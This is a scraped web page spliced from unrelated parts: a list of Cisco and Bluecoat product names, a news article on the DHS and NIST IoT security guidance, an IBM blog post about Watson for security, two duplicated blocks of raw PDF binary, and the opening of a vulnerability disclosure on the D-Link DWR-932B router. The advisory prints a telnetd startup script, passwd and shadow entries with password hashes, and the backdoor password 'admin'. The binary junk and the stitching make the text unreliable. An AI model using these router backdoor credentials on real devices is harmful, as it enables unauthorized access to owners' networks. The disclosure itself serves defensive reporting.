Cisco Intrusion Prevention System (IPS) Solutions 0
Cisco InTracer 0
Cisco Intelligent Automation for Cloud 0
Cisco Identity Services Engine 0
Cisco Hosted Collaboration Mediation Fulfillment 0
Cisco FireSIGHT System Software 0
Cisco Expressway series 0
Cisco Enterprise Content Delivery System (ECDS) 0
Cisco Emergency Responder 0
Cisco Emergency Responder
Cisco Email Security Appliance (ESA) 0
Cisco Edge 340 Digital Media Player 0
Cisco Edge 300 Digital Media Player 0
Cisco DX Series IP Phones 0
Cisco Content Security Management Appliance (SMA) 0
Cisco Content Security Management Appliance 0
Cisco Content Security Appliance Update Servers 0
Cisco Connected Grid Routers 0
Cisco Connected Analytics For Collaboration 0
Cisco Configuration Professional 0
Cisco Computer Telephony Integration Object Server (CTIOS) 0
Cisco Common Services Platform Collector 0
Cisco Cloupia Unified Infrastructure Controller 0
Cisco Cloud Web Security (CWS) 0
Cisco Cloud Web Security 0
Cisco Cloud Object Storage 0
Cisco Clean Access Manager 0
Cisco Broadband Access Center Telco and Wireless 0
Cisco ATA 190 Series Analog Terminal Adaptors 0
Cisco ATA 187 Analog Telephone Adaptor 0
Cisco ASR 5000 Series 0
Cisco ASA Next-Generation Firewall Services 0
Cisco Application Policy Infrastructure Controller (APIC) 0
Cisco Application Networking Manager (ANM) 0
Cisco Application and Content Networking System (ACNS) 0
Cisco AnyConnect Secure Mobility Client for Windows 0
Cisco AnyConnect Secure Mobility Client for Mac OS X 0
Cisco AnyConnect Secure Mobility Client for Linux 0
Cisco AnyConnect Secure Mobility Client for iOS 0
Cisco AnyConnect Secure Mobility Client for desktop platforms 0
Cisco AnyConnect Secure Mobility Client for Android 0
Cisco AnyConnect Secure Mobility Client 0
Cisco Aironet 2700 Series Access Points 0
Cisco Agent for OpenFlow 0
Cisco Agent Desktop for Cisco Unified Contact Center Express 0
Cisco Agent Desktop
Cisco Adaptive Security Appliance (ASA) 0
Cisco ACE30 Application Control Engine Module 0
Cisco ACE 4710 Application Control Engine 0
Cisco 910 Industrial Router 0
Cisco 500 Series Stackable (Sx500) Managed Switches 0
Cisco 500 Series Stackable 0
Cisco 4400 Series Digital Media Players 0
Cisco 4300 Series Digital Media Players 0
Cisco 220 Series Smart Plus (Sx220) Switches 0
CentOS CentOS 7
Bluecoat X-Series XOS 9.7
Bluecoat X-Series XOS 11.0
Bluecoat X-Series XOS 10.0
Bluecoat SSL Visibility 3.9
Bluecoat SSL Visibility 3.8.4FC
Bluecoat PolicyCenter S-Series 1.1
Bluecoat PolicyCenter 9.2
Bluecoat PacketShaper S-Series 11.6
Bluecoat PacketShaper S-Series 11.5
Bluecoat PacketShaper S-Series 11.4
Bluecoat PacketShaper S-Series 11.3
Bluecoat PacketShaper S-Series 11.2
Bluecoat PacketShaper 9.2
Bluecoat Norman Shark SCADA Protection 5.3
Bluecoat Norman Shark Network Protection 5.3
Bluecoat Norman Shark Industrial Control System Protection 5.3
Bluecoat Management Center 1.7
Bluecoat Malware Analysis Appliance 4.2


SecurityFocus Vulnerabilities

Two U.S. government agencies have released security guidance documents focusing heavily on IoT security following a series of massive DDoS attacks that leveraged IoT devices using default security settings.

Both the Department of Homeland Security (DHS) and the National Institute of Standards and Technology (NIST) have released recommendations for how to approach security for the Internet of Things (IoT). Experts said the IoT security guidance from DHS focuses on the basics while NIST had offers more of a "how-to" for businesses.

The DHS IoT security guidance put forth six strategic principles intended to equip IoT developers, manufacturers, service providers and consumers "with tools to comprehensively account for security as they develop, manufacture, implement or use network-connected devices." The DHS recommends: incorporating IoT security in the design phase, pushing security updates, building upon proven security practices, prioritizing higher risk issues, promoting transparency and being deliberate in the use of IoT devices.

Derek Manky, global security strategist at Fortinet, told SearchSecurity that the focus on the basics from the DHS was the best strategy for IoT security guidance.

"There's a lot of groups that should have focused on [the basics], but unfortunately nobody saw the problem until there were millions of devices deployed across the world," Manky said via email. "I think the best option is to focus on the basics right now. There aren't any best practices out there from an IoT perspective -- for security and development alike. The first step is to develop the right framework and then start changing the mindset of the IoT developers."

Art Swift, president of prpl Foundation, said the DHS offered "a good baseline for IoT security practices." 

"While it may seem basic, these are exactly the things manufacturers and developers need to be doing to improve security in the Internet of Things, Swift said. "The part that is not addressed by the DHS is to provide any practical guidelines on how to implement its recommendations."

Jamison Utter, vice president at IoT cybersecurity firm Senrio, said "it's important at this phase for any governing body to set for things that are high impact, but very achievable."

"For example in the 'Incorporate Security at the Design Phase' section is to enable security by default," Utter told SearchSecurity via email. "This single recommendation of changing default passwords would have a profound impact on simple compromises -- and 90% are simple. Mirai, for example, uses default passwords."

Manky agreed that the Mirai botnet attack was proof that security from the start is one of the most important issues in IoT security.

"Mirai was shown to have accumulated its great power through something incredibly simple -- trying to log-in to devices using their default usernames and passwords. If developers just eliminated default usernames and passwords it would have completely dismantled this botnet before it got off the ground," Many said. "Security from the start means incorporating things like the Common Weakness Enumeration to evaluate the security posture of your product, where things like hardcoded and default passwords would be fleshed out before they ever make it out the door."

However, Utter said the DHS IoT security guidance left out more technical details.

"The document seems to have some overtones (ok, strong ones) of recycled ideology. Things like 'patch management' is really not something the IoT has the ability to scale right now," Utter said. "It also has some traditional thinking and assumptions -- like that the IoT is still an 'on network' issue, where we rather think of the IoT as an always connected and always on issue. So the guidance is good, the vision of how to apply this frame work to the reality of IoT falls a bit short."

Manky said "the DHS release explains the what and why, and if you want to security seriously, the NIST Special Publication gives you a how-to."

According to the new NIST Special Publication 800-160, " Engineering-based solutions are essential to managing the growing complexity, dynamicity, and interconnectedness of today's systems, as exemplified by cyber-physical systems and systems-of-systems, including the Internet of Things. This publication addresses the engineering-driven perspective and actions necessary to develop more defensible and survivable systems, inclusive of the machine, physical, and human components that compose the systems and the capabilities and services delivered by those systems."

Swift said "it's time to get the industry at large involved and effecting the change needed to make IoT safer and more secure."

"Securing devices at the hardware layer is one of the most important ways the IoT is going to become more secure, but using open source software is also a key area. Manufacturers and developers should no longer rely on proprietary code that can be reverse engineered as it has been proven time and time again that this 'security by obscurity' approach is broken," Swift said. "By using open source implementations, which are open to review and hence inherently more secure, developers can agree to get basics right on security first and then compete on value-add market differentiators."

Manky praised the two new IoT security guidances for promoting the need for more discussion on the topic.

"This needs to be collaborative, and it's not just Silicon Valley they need on board. They need manufacturers of practically every vertical to adopt this mindset, and a surefire way to lose your voice is to demand too much too soon," Manky said. "These are things we've been saying within the tech world for years, but the IoT reaches so many new people. So many things that weren't done over IP are quickly moving that direction. It's the next wave of digitalization, and continual outreach is important."

Next Steps

Learn more about the risks to consider with IoT systems.

Find out if passwords are destined for obscurity.

Get info on why the IoT security window is closing.


SearchSecurity: Security Wire Daily News

Authored by David Shipley, Director of Strategic Initiatives, Information Technology Services, University of New Brunswick.

Embracing Cognitive Security Solutions

In many organizations, security is assumed rather than actively pursued. It is my job to make sure that isn’t the case. As the data center for three other universities in our province, my security team at the University of New Brunswick (UNB) protects a large digital bank of information with a fraction of the security resources of larger organizations. We have to protect student records, proprietary research material and other assets that criminals value highly.

A university is like the Mos Eisley spaceport of cybersecurity. We have every bad thing you could imagine: malware, vulnerable devices, patching issues and bring-your-own-device (BYOD) everywhere. We are, by our nature, open and transparent, yet we are supposed to be secure. Those two things do not go well together; we exist in that uncomfortable friction. Because of that, however, we are the perfect breeding ground for new ideas.

After the Gold Rush

We are faced with an exponentially growing volume of attacks due to the proliferation of new tools for cybercriminals. Today, the barriers to entry for cybercrime are tremendously low, creating a kind of gold rush. I feel this is due to a number of different factors, including the lack of a real, global cybercrime framework and national policing resources to address incidents and attacks. I am also worried about the amount of money that cybercriminals are obtaining to reinvest into their capabilities, widening the gap between the attackers and the attacked.

We are outgunned and need new capabilities to use as force multipliers to level the playing field with cybercriminals. UNB is exploring cognitive security solutions with IBM to augment our capabilities to deal with these challenges. UNB is one of eight universities in North America chosen by IBM to help adapt Watson cognitive technology for use in the cybersecurity battle. We are feeding real data into the Watson system as a natural extension of the work we are doing for security information and event management (SIEM).

Stop Fighting Fires

We have high expectations for cognitive security solutions in the coming years. The technology has so much potential to address our labor shortage gap, reduce our risk profile and increase our efficiency of response.

Cognitive systems can leverage unstructured data to provide the context behind attacks and provide an informed second opinion to increase our confidence for making decisions. I read a lot on a daily basis, but that might help me discover roughly 1 percent of what is out there in terms of the latest threats and risks at any given time. How am I supposed to apply only 1 percent against hundreds of active offenses on a daily basis? I hope cognitive security solutions can enable me to take a more holistic view of my cybersecurity situation.

Ultimately, I believe that these Watson-based solutions will allow security professionals to move to a higher level of value for their organizations. Cognitive solutions can help them get away from merely firefighting and into tackling longer-term strategic issues, such as user behavior and organizational culture, that can change the outcome of the present one-sided battle.

Read the IBM Executive Report: Cybersecurity in the cognitive era


Security Intelligence

%PDF-1.6 %äãÏÒ 1 0 obj [/PDF/ImageB/ImageC/ImageI/Text] endobj 4 0 obj <</Length 5 0 R /Filter/FlateDecode >> stream xœ endstream endobj 5 0 obj 8 endobj 6 0 obj <</Subtype/Image /Width 150 /Height 150 /BitsPerComponent 8 /ColorSpace/DeviceRGB /Filter/FlateDecode /Length 7 0 R >> stream xœígx]ŵ÷!!›póá^¾¼onè á’¼¸@hƒ &6„zÁÀIè6ظɲ-˲%Y]Vï½Z½ËjVï½Ë²lÉr’ûþgÖÞsf—st$ ‰÷³=Gçì}ÊþíµÖÍ̞ùßÿ=¿ßÎoç·óÛùíüv~;¿ßÎosޞjk﬩­/.-ËÍ/ŒOLŽKHŽOŠ‰KŒŽM€EÅÄGFÇEDņGÆÀÂ"¢³sóaûË*êšpøää‘sý;þ…¶écÇúúªkëò ŠSÓ3SÒ2RR÷%§¦'¥¤'&§%$ ¥Æ'¦Ø14<*$ ,’,($ †7))-ëìꞜœ<׿òŸm;yêÔÀà`]}#\,3+7#3g_FvzFVÚ¾,Sˆx”’Ãㄤ”ø4ŽJƒÃ‚BaØ­¨¤´£³ëÌ™3çúׇ·S§N WVUçææä îeåäefç ˆY9YÙyx>'¯ûäååçåãùþ2tÎ:…œ@ASÑ? æ·7(;'ï<Ê9m_~ùåÁƒãÈP…%ŒHAˆˆpâ’â’²Òýå°XiYqÉþ¢âÒ¢Råû ê<~Ë<484BÑ×?–•Û××®OÏ·z;}útOoyE•ŽHAa10••WÂ+*À°þ…YXˆ"‡Â7‘4]÷†È}üÂ#£Tל>ï’Ú ì !tD`eåUªkkjêªkêð ê@Í7 QÄXDW¢·ïހÀ|¹cÇfÎõ™;÷ÛéÓgÚ;:C&@5µu MP/0T ç"R. ½|üaˆêǎ;×gñÜlÐ=½} "pà/56575·66µ€à· "B+4R¤[email protected]Õ\ŠçúŒ~£ÛÈÈh}}#p"õ -­íÜÚš[Zç€âyáŸèéåóðòñðdæã»72:6" ¥DtjzÆÙ@¤b)[email protected]ôôöójmm;×çõ›ØŽÍ̀b$ pÔp …@ kkïhmë°bfVNDd´¯_Àf‡­«×¬]õ—÷ædŸ­]¿~ÃfW7$ 50š+DªAWD/ß„Ääééés}Ž¿® eÂððáA–è›;;»;»z cPsÙ1'7?4,b‡³Ë~2Wd¶íãO>Å•àíãrÞ~ˆpFè$ Gq§OEeÕ¹>Ù¿Í?ÞÖÖÑÐØL8ðà»z»º{f…˜_Päãë¿æÓu6¼òÖÊ'þôâ²Wž¾ý™mö­úÏvûò«¯úú…CØ ã¯mˆyù.»\§§Ôpædkñ•,¹ò‚¯ºàÁ«/xèê–’]sÁÃ’á_z;`7ìŒCp aå@q1€&|Ùø¹[·CÙΈˆJÝ=¼‹JJq ŸkóÜNž< 4¡ÀhxddxdthxÄÄä”´›¶Áýæ©E?yðj„ì!"uí¿¿ö‚e?g¶üç.ÿÅ…»Ž›úïò_`eO‚qøC*P•&>׉åºÏ7BºÌ 184冀ˆˆzêÔésMcn®:hN!‡‚ µ±°¨dÓf ;d+8ÅO–¨à«ÔàS„Œ`=z³?üòÂÇ`×3{ÜŠÑ«Ø ;ÓQ€é/T *M|G g_üâãFŽÁa¶!Rù/ b¤’sÅÞ ø¦¦¦ETăѱƒÇ·±¾¡i»ÓN,¹þñ».yà*Åãdp‚Ú~©Àzâ¿™=yÃ…OÁ~uáa¿fö´dô^ÂØ ;ÓQ„•€M%÷J| ¸¤Nü8lÙp¶!"¢ ˆÐ9€ø폨ø†GQ±·¯ÿÐÄaØø¡ Sˆ cdÇÒ9ÅIœêhDíIÎtžý¿Ÿåö܍°ïÁž7‰í‰Cžápñ&TÐ|ä: Jî’—

hbàÛ‘ÉÎC‡xTì<:<9 ›8< ß)1Saw­Âî:pÌ}TjŒ‡uË^æöÊÿ0•Ûk·êž§hș⭚ÏÞ¨¢T½RqIž(UüɃס–Ñ8ãn÷ï4D|Ÿ#GŽ"¯A±"ßôô1dCSˆí]H"²Î¼lé L«È~GiŽ±»%/îq8Ãßþ7½À½ì%Áú춬 »Ùë£çiìü'+}é–‹š„’åy€\I”ÄW]ô3TrPÝ°Ñྋ™t™ž;„ÁËffŽ;6c ±¤´ì£×ˆ_ˆÄÂ&i•¥×hüîIbÇC¥î•[,Ôˆè¼ûíVÂîøÁ›6 ;`7ìü†Àʁ š„’%°:Ž"®rƒ ºì•§ÅÏY½fíÞÀ¨˜øY!"'BÞ 2é25…° ×DÈ­|3…˜¾/CÎz¬0®GZå×éØ1§C¨D{Y€ãNôºŠŒ¸¼uÇÅoÝyñŸ™]ò6Ù]cÏÓ>؇¨L9Ð×µ(™Wr—4áxÝ…¤sTg¼þñ»…3"¢Bº|W âÓOœ<É_? "Á?~ü„ºé É bJÖ[r•%lB<°|§cG¡Rõ8œJ ,Ö;ÜÞ…ÝÍl•£WßU÷û®‹9S…&ÞÖ‚òVö¡ŠKj9âKB²Š ú û!—=ü+¹Àm—=ƒCOœ8y® âsÏœ9ƒŠ‚ƒÃàj¦ƒÅ¯C¬DNR,Ë¥°ù4Ïwzv

<¸¿ª¢¯¿ dÒˆK\Eå scÍãÌø6:̘Ê6vp“v¦Ã‡GG¡+z{Ÿpû{¥–ãJ®]Wˆ *9ãSŠ¼a5#~2û¢ŸÉU¿ËnwkEÛ)T Nà7Ÿrúôé¶6Ö㈤(ñP&!ÊÁSÅw•Š‰OœÏßȲÞË·8„{Jø¬²£ '\Ž£;8ÓÑDÄǬö=áþ!eLŽ¯ËΨfFüüJ‹ñþËïy~¹=ÂFôbÄÆ'"1ñ)==}ˆs-­pÁnülüp#ÄŒŒ,}ðTðqÝB‰O-¼RxíÖŠÚjÆÎßȈÀGìdp4ãcãÌ*vH5ö/½dŠ²§§¿qÏG,]Êßæ5ˆT¹3òˆjø„¢6œúúšBý‰ûËʿ÷ªÆ¦–¦æ[email protected]'P±¬¼Â€ïJ->%ñ)¢gcÅíHõ  àé âÌoqÜ&ÊvV÷‘òÔãSKªV²"8«ë vÚyhVj¶iâÍò¦§¦5ûúžÄîSjáŒoßÅ"*j‘M ruºøJÔ‰¢Øwزîg4B¥š¾ŽXʺݏ«­k¨«oD¤œm#ÄаÑhÆZ]¨l_FÊSÉŠ÷½ªâ“zïÜ‚føT¹b…‘"·Ã‡›ë¯œŸÐÕ××_XXˆ ö•´"û“žÿÛ÷iœQŽ¨zˆBØP‰ÁŠýËþ•H+î{¼L!î ¡!‹ªÐKáÚÍÍ-5µõ€ J ¡2ÄŠÊ*ñ=Y›çý—+eû£¼p ´4«««KKKQ ˆñ¾ Ä÷­AdÂF)1Pìã‡?¦ªžE†»‡·)D1Œ?/¿p¡$ ç±²ªºê@ ¢ìêîÑA¬®©ñ󲥿’ÒW/HîÏ)e;Sà$ ]´ø[email protected]|ÂõLØ8…ÑáÙÌBSEYVV¶ÿþŽŽS‚ˆ-RÒ¢" ¥Nä-6BÕP,}àŠë¿[ÄR1PJ†ˆX*n¨™šš:7$ „t©¨<ˆM͝]ÝÔš-CtÚ±S–`ñóÁ«ôéïß [email protected]ÈQîøpN::;mà3u=…mjG¸ÙD‰ü[^^ˆMMMÖ ˆ[¬AdêT­_¾E‘¦"!bé¶íÎòl¢¸+ª¸¤ôì݈äN7÷`ÔoÍ–!æäækô§!~*ê‰~Åm¬~ëÖŠŇsÒÙÙi ܼ­½S±ÅÚë:{kjj©¬¨Äææf bÿ€Q §¼Ä`u"µØ0Us‹šo`Jà%–ʺg„ˆXJ÷'ú¥ª°iY ¢Ž­Ù2ÄÏÖ®·4¿þ¤òÇÏï='ÒßmL³!ý1Æر¢UU¢m‚:OÔQm±áª†%Dc,½ÿrÑÚæà¸]7ï A„IJòŠ³qC8 ®>k 6·°¶PÄ”Ôt1ÎS¦?Y¿ƒ6~jÒŸ„ïC†ïÇŸ<ÐÙÙ%)OCð”#§.l9:yT¶©#dSS_šdf9¤¥¹åÀj‚8+Á¯ŒÂæ=QìKªÆKÕâºôák/XråO¼NHxœ"|“n÷FÝqòäü;ñ¿øâÀ*)-DȨPjЖ[email protected]¡?¥ø)ÒÔáŸãûˆá»t5'¨-¬á“sÜ¬àŽªfJ“Ž­©©…J#ˆ8cöBP!¾/ Ê Q©-º”j¸¤ÝO[·g DqÏ>NõWóª Ù˜'àzÅ%û±¶*¦U1#3[€úS-´éð-úñÇ÷ߥkƒ ¦Ée6K-óY,½‰±‘%Í’«.Y|µÈ†tW”"jCš=#m_æ©S§æá†ø†ÃÃ#…E¥EÅ¥ˆ¢¨©KB†¸mûÈÌ-l|éOmü$ õ"ð]úéx´Q|ŠÆ1=>«ì,°¦¦MGG!«¢œkkëfffæ1Î÷ߌ±”t)~>IJÙpç.Wã\p JS  '>|x®-¥Ô[[ßPPXˆ4S"Ô© RÔ: "`HJñSJ—®¾Å—~¶¤‹Ôâ›°Ÿ`'HM6£šòŒåÀÀ@CCƒžØÓÓ348„¯sôèQÄ"{ J ‘ÅRE—šº!²áb– Emh:¡Ÿ˜Çæ@u 2Úœ‚øôôta1M©TRS[‚:ˆ~þ–PvÀ'ŒÈéOKü>‹^úÙƒŒ Yüäø&'fç73›)(q`gª‰

%PDF-1.6 %äãÏÒ 1 0 obj [/PDF/ImageB/ImageC/ImageI/Text] endobj 4 0 obj <</Length 5 0 R /Filter/FlateDecode >> stream xœ endstream endobj 5 0 obj 8 endobj 6 0 obj <</Subtype/Image /Width 150 /Height 150 /BitsPerComponent 8 /ColorSpace/DeviceRGB /Filter/FlateDecode /Length 7 0 R >> stream xœígx]ŵ÷!!›póá^¾¼onè á’¼¸@hƒ &6„zÁÀIè6ظɲ-˲%Y]Vï½Z½ËjVï½Ë²lÉr’ûþgÖÞsf—st$ ‰÷³=Gçì}ÊþíµÖÍ̞ùßÿ=¿ßÎoç·óÛùíüv~;¿ßÎosޞjk﬩­/.-ËÍ/ŒOLŽKHŽOŠ‰KŒŽM€EÅÄGFÇEDņGÆÀÂ"¢³sóaûË*êšpøää‘sý;þ…¶écÇúúªkëò ŠSÓ3SÒ2RR÷%§¦'¥¤'&§%$ ¥Æ'¦Ø14<*$ ,’,($ †7))-ëìꞜœ<׿òŸm;yêÔÀà`]}#\,3+7#3g_FvzFVÚ¾,Sˆx”’Ãㄤ”ø4ŽJƒÃ‚BaØ­¨¤´£³ëÌ™3çúׇ·S§N WVUçææä îeåäefç ˆY9YÙyx>'¯ûäååçåãùþ2tÎ:…œ@ASÑ? æ·7(;'ï<Ê9m_~ùåÁƒãÈP…%ŒHAˆˆpâ’â’²Òýå°XiYqÉþ¢âÒ¢Råû ê<~Ë<484BÑ×?–•Û××®OÏ·z;}útOoyE•ŽHAa10••WÂ+*À°þ…YXˆ"‡Â7‘4]÷†È}üÂ#£Tל>ï’Ú ì !tD`eåUªkkjêªkêð ê@Í7 QÄXDW¢·ïހÀ|¹cÇfÎõ™;÷ÛéÓgÚ;:C&@5µu MP/0T ç"R. ½|üaˆêǎ;×gñÜlÐ=½} "pà/56575·66µ€à· "B+4R¤[email protected]Õ\ŠçúŒ~£ÛÈÈh}}#p"õ -­íÜÚš[Zç€âyáŸèéåóðòñðdæã»72:6" ¥DtjzÆÙ@¤b)[email protected]ôôöójmm;×çõ›ØŽÍ̀b$ pÔp …@ kkïhmë°bfVNDd´¯_Àf‡­«×¬]õ—÷ædŸ­]¿~ÃfW7$ 50š+DªAWD/ß„Ääééés}Ž¿® eÂððáA–è›;;»;»z cPsÙ1'7?4,b‡³Ë~2Wd¶íãO>Å•àíãrÞ~ˆpFè$ Gq§OEeÕ¹>Ù¿Í?ÞÖÖÑÐØL8ðà»z»º{f…˜_Päãë¿æÓu6¼òÖÊ'þôâ²Wž¾ý™mö­úÏvûò«¯úú…CØ ã¯mˆyù.»\§§Ôpædkñ•,¹ò‚¯ºàÁ«/xèê–’]sÁÃ’á_z;`7ìŒCp aå@q1€&|Ùø¹[·CÙΈˆJÝ=¼‹JJq ŸkóÜNž< 4¡ÀhxddxdthxÄÄä”´›¶Áýæ©E?yðj„ì!"uí¿¿ö‚e?g¶üç.ÿÅ…»Ž›úïò_`eO‚qøC*P•&>׉åºÏ7BºÌ 184冀ˆˆzêÔésMcn®:hN!‡‚ µ±°¨dÓf ;d+8ÅO–¨à«ÔàS„Œ`=z³?üòÂÇ`×3{ÜŠÑ«Ø ;ÓQ€é/T *M|G g_üâãFŽÁa¶!Rù/ b¤’sÅÞ ø¦¦¦ETăѱƒÇ·±¾¡i»ÓN,¹þñ».yà*Åãdp‚Ú~©Àzâ¿™=yÃ…OÁ~uáa¿fö´dô^ÂØ ;ÓQ„•€M%÷J| ¸¤Nü8lÙp¶!"¢ ˆÐ9€ø폨ø†GQ±·¯ÿÐÄaØø¡ Sˆ cdÇÒ9ÅIœêhDíIÎtžý¿Ÿåö܍°ïÁž7‰í‰Cžápñ&TÐ|ä: Jî’—

hbàÛ‘ÉÎC‡xTì<:<9 ›8< ß)1Saw­Âî:pÌ}TjŒ‡uË^æöÊÿ0•Ûk·êž§hș⭚ÏÞ¨¢T½RqIž(UüɃס–Ñ8ãn÷ï4D|Ÿ#GŽ"¯A±"ßôô1dCSˆí]H"²Î¼lé L«È~GiŽ±»%/îq8Ãßþ7½À½ì%Áú춬 »Ùë£çiìü'+}é–‹š„’åy€\I”ÄW]ô3TrPÝ°Ñྋ™t™ž;„ÁËffŽ;6c ±¤´ì£×ˆ_ˆÄÂ&i•¥×hüîIbÇC¥î•[,Ôˆè¼ûíVÂîøÁ›6 ;`7ìü†Àʁ š„’%°:Ž"®rƒ ºì•§ÅÏY½fíÞÀ¨˜øY!"'BÞ 2é25…° ×DÈ­|3…˜¾/CÎz¬0®GZå×éØ1§C¨D{Y€ãNôºŠŒ¸¼uÇÅoÝyñŸ™]ò6Ù]cÏÓ>؇¨L9Ð×µ(™Wr—4áxÝ…¤sTg¼þñ»…3"¢Bº|W âÓOœ<É_? "Á?~ü„ºé É bJÖ[r•%lB<°|§cG¡Rõ8œJ ,Ö;ÜÞ…ÝÍl•£WßU÷û®‹9S…&ÞÖ‚òVö¡ŠKj9âKB²Š ú û!—=ü+¹Àm—=ƒCOœ8y® âsÏœ9ƒŠ‚ƒÃàj¦ƒÅ¯C¬DNR,Ë¥°ù4Ïwzv

<¸¿ª¢¯¿ dÒˆK\Eå scÍãÌø6:̘Ê6vp“v¦Ã‡GG¡+z{Ÿpû{¥–ãJ®]Wˆ *9ãSŠ¼a5#~2û¢ŸÉU¿ËnwkEÛ)T Nà7Ÿrúôé¶6Ö㈤(ñP&!ÊÁSÅw•Š‰OœÏßȲÞË·8„{Jø¬²£ '\Ž£;8ÓÑDÄǬö=áþ!eLŽ¯ËΨfFüüJ‹ñþËïy~¹=ÂFôbÄÆ'"1ñ)==}ˆs-­pÁnülüp#ÄŒŒ,}ðTðqÝB‰O-¼RxíÖŠÚjÆÎßȈÀGìdp4ãcãÌ*vH5ö/½dŠ²§§¿qÏG,]Êßæ5ˆT¹3òˆjø„¢6œúúšBý‰ûËʿ÷ªÆ¦–¦æ[email protected]'P±¬¼Â€ïJ->%ñ)¢gcÅíHõ  àé âÌoqÜ&ÊvV÷‘òÔãSKªV²"8«ë vÚyhVj¶iâÍò¦§¦5ûúžÄîSjáŒoßÅ"*j‘M ruºøJÔ‰¢Øwزîg4B¥š¾ŽXʺݏ«­k¨«oD¤œm#ÄаÑhÆZ]¨l_FÊSÉŠ÷½ªâ“zïÜ‚føT¹b…‘"·Ã‡›ë¯œŸÐÕ××_XXˆ ö•´"û“žÿÛ÷iœQŽ¨zˆBØP‰ÁŠýËþ•H+î{¼L!î ¡!‹ªÐKáÚÍÍ-5µõ€ J ¡2ÄŠÊ*ñ=Y›çý—+eû£¼p ´4«««KKKQ ˆñ¾ Ä÷­AdÂF)1Pìã‡?¦ªžE†»‡·)D1Œ?/¿p¡$ ç±²ªºê@ ¢ìêîÑA¬®©ñ󲥿’ÒW/HîÏ)e;Sà$ ]´ø[email protected]|ÂõLØ8…ÑáÙÌBSEYVV¶ÿþŽŽS‚ˆ-RÒ¢" ¥Nä-6BÕP,}àŠë¿[ÄR1PJ†ˆX*n¨™šš:7$ „t©¨<ˆM͝]ÝÔš-CtÚ±S–`ñóÁ«ôéïß [email protected]ÈQîøpN::;mà3u=…mjG¸ÙD‰ü[^^ˆMMMÖ ˆ[¬AdêT­_¾E‘¦"!bé¶íÎòl¢¸+ª¸¤ôì݈äN7÷`ÔoÍ–!æäækô§!~*ê‰~Åm¬~ëÖŠŇsÒÙÙi ܼ­½S±ÅÚë:{kjj©¬¨Äææf bÿ€Q §¼Ä`u"µØ0Us‹šo`Jà%–ʺg„ˆXJ÷'ú¥ª°iY ¢Ž­Ù2ÄÏÖ®·4¿þ¤òÇÏï='ÒßmL³!ý1Æر¢UU¢m‚:OÔQm±áª†%Dc,½ÿrÑÚæà¸]7ï A„IJòŠ³qC8 ®>k 6·°¶PÄ”Ôt1ÎS¦?Y¿ƒ6~jÒŸ„ïC†ïÇŸ<ÐÙÙ%)OCð”#§.l9:yT¶©#dSS_šdf9¤¥¹åÀj‚8+Á¯ŒÂæ=QìKªÆKÕâºôák/XråO¼NHxœ"|“n÷FÝqòäü;ñ¿øâÀ*)-DȨPjЖ[email protected]¡?¥ø)ÒÔáŸãûˆá»t5'¨-¬á“sÜ¬àŽªfJ“Ž­©©…J#ˆ8cöBP!¾/ Ê Q©-º”j¸¤ÝO[·g DqÏ>NõWóª Ù˜'àzÅ%û±¶*¦U1#3[€úS-´éð-úñÇ÷ߥkƒ ¦Ée6K-óY,½‰±‘%Í’«.Y|µÈ†tW”"jCš=#m_æ©S§æá†ø†ÃÃ#…E¥EÅ¥ˆ¢¨©KB†¸mûÈÌ-l|éOmü$ õ"ð]úéx´Q|ŠÆ1=>«ì,°¦¦MGG!«¢œkkëfffæ1Î÷ߌ±”t)~>IJÙpç.Wã\p JS  '>|x®-¥Ô[[ßPPXˆ4S"Ô© RÔ: "`HJñSJ—®¾Å—~¶¤‹Ôâ›°Ÿ`'HM6£šòŒåÀÀ@CCƒžØÓÓ348„¯sôèQÄ"{ J ‘ÅRE—šº!²áb– Emh:¡Ÿ˜Çæ@u 2Úœ‚øôôta1M©TRS[‚:ˆ~þ–PvÀ'ŒÈéOKü>‹^úÙƒŒ Yüäø&'fç73›)(q`gª‰


SANS Information Security Reading Room

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

## Advisory Information

Title: Multiple vulnerabilities found in the Dlink DWR-932B (backdoor,
backdoor accounts, weak WPS, RCE ...)
Advisory URL: https://pierrekim.github.io/advisories/2016-dlink-0x00.txt
Blog URL: https://pierrekim.github.io/blog/2016-09-28-dlink-dwr-932b-lte-routers-vulnerabilities.html
Date published: 2016-09-28
Vendors contacted: Dlink
Release mode: Released
CVE: no current CVE
DWF: no current DWF

## Product Description

Dlink is a multinational networking equipment manufacturing corporation.

## Vulnerabilities Summary

The Dlink DWR-932B is a LTE router / access point overall badly
designed with a lot of vulnerabilities.
It's available in a number of countries to provide Internet with a LTE network.
It's a model based on the (in)famous Quanta LTE router models and
inherits some vulnerabilities.

The tests below are done using the latest available firmware (firmware
DWR-932_fw_revB_2_02_eu_en_20150709.zip,
model revision B,
/Share3/DailyBuild/QDX_DailyBuild/QDT_2031_DLINK/QDT_2031_OS/source/LINUX/apps_proc/oe-core/build/tmp-eglibc/sysroots/x86_64-linux/usr/bin/armv7a-vfp-neon-oe-linux-gnueabi/arm-oe-linux-gnueabi-gcc).

The summary of the vulnerabilities is:

- Backdoor accounts
- Backdoor
- Default WPS PIN
- Weak WPS PIN Generation - with a reverse-engineered algorithm
- Leaking No-IP account (?)
- Multiple vulnerabilities in the HTTP daemon (qmiweb)
- Remote FOTA (Firmware Over The Air)
- Bad security practices
- Security removed in UPnP

A personal point of view: at best, the vulnerabilites are due to
incompetence; at worst, it is a deliberate act of security sabotage
from the vendor. Not all the vulnerabilities found have been disclosed
in this advisory. Only the significant ones are shown.

This router is still on sale.

Due to lack of security patches provided by the vendor, the
vulnerabilities will remain unpatched and customers with questions
should contact their local/regional D-Link support office for the
latest information.

## Details - Backdoor accounts

By default, telnetd and SSHd are running in the router.

Telnetd is running even if there is no documentation about it:

[email protected]:~$ cat ./etc/init.d/start_appmgr

[...]
#Sandro for telnetd debug...
start-stop-daemon -S -b -a /bin/logmaster
#if [ -e /config2/telnetd ]; then
start-stop-daemon -S -b -a /sbin/telnetd
#fi
#Sandro
[...]

2 backdoor accounts exist and can be used to bypass the HTTP
authentication used to manage the router.

[email protected]:~$ grep admin /etc/passwd
admin:htEcF9TWn./9Q:168:168:admin:/:/bin/sh
[email protected]:~$

The password for admin is 'admin' and can be found in the /bin/appmgr
program using IDA:

About the root user:

[email protected]:~$ cat ./etc/shadow
root:aRDiHrJ0OkehM:16270:0:99999:7:::
daemon:*:16270:0:99999:7:::
bin:*:16270:0:99999:7:::
sys:*:16270:0:99999:7:::
sync:*:16270:0:99999:7:::
games:*:16270:0:99999:7:::
man:*:16270:0:99999:7:::
lp:*:16270:0:99999:7:::
